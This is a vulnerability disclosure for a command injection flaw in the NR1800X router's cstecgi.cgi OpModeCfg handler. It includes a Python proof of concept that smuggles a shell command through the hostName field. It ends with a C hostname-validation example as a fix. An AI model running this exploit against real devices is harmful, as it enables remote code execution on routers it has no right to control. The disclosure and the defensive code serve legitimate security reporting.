Hi, we found a command injection vulnerability in the **NR1800X** (firmware version V9.1.0u.6279_B20210910) and are contacting you at the first opportunity.

In the function OpModeCfg of the file /cgi-bin/cstecgi.cgi, the string hostName is not checked before it is passed to doSystem, which results in command injection.

PoC

```python
import requests

# CGI endpoint on the test device
url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"uid=1234"}
# hostName carries the injected shell command
data = {'topicurl' : "setOpModeCfg",
        "proto" : "8",
        "switchOpMode" : "1",
        "hostName" : "';ls -lh ../ ;'"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
```

Impact

Remote code execution

After executing the PoC, the ls command is executed.
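A defensive counterpart to the report above, as an added example that is not the vendor's code or part of the original report: an allowlist check a CGI handler could apply to hostName before the value reaches any command execution. The function name `is_valid_hostname` and the choice of RFC 1123 hostname rules are assumptions; the sample inputs are constructed, apart from the PoC payload taken from the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the firmware). Returns 1 if s is a valid
 * RFC 1123 hostname, 0 otherwise. Only ASCII letters, digits, '-' and '.'
 * pass, so quotes, ';', spaces, '$', '`', '|' and '&' are all rejected. */
int is_valid_hostname(const char *s)
{
    size_t len, i, label_len = 0;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len == 0 || len > 253)          /* total length limit */
        return 0;

    for (i = 0; i < len; i++) {
        char c = s[i];
        int alnum = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                    (c >= '0' && c <= '9');
        if (c == '.') {
            /* no empty labels, no label ending in '-' */
            if (label_len == 0 || s[i - 1] == '-')
                return 0;
            label_len = 0;
        } else if (alnum || c == '-') {
            if (c == '-' && label_len == 0)   /* no leading '-' */
                return 0;
            if (++label_len > 63)             /* per-label limit */
                return 0;
        } else {
            return 0;                         /* anything else is refused */
        }
    }
    return label_len > 0 && s[len - 1] != '-';
}

int main(void)
{
    /* Constructed inputs; the third is the hostName value from the PoC. */
    const char *samples[] = { "NR1800X", "router-1.lan", "';ls -lh ../ ;'" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %s\n", samples[i],
               is_valid_hostname(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Validation of this kind is best paired with running the external program through an argument vector (for example the `exec` family) instead of a shell command string, so the value is never parsed by a shell.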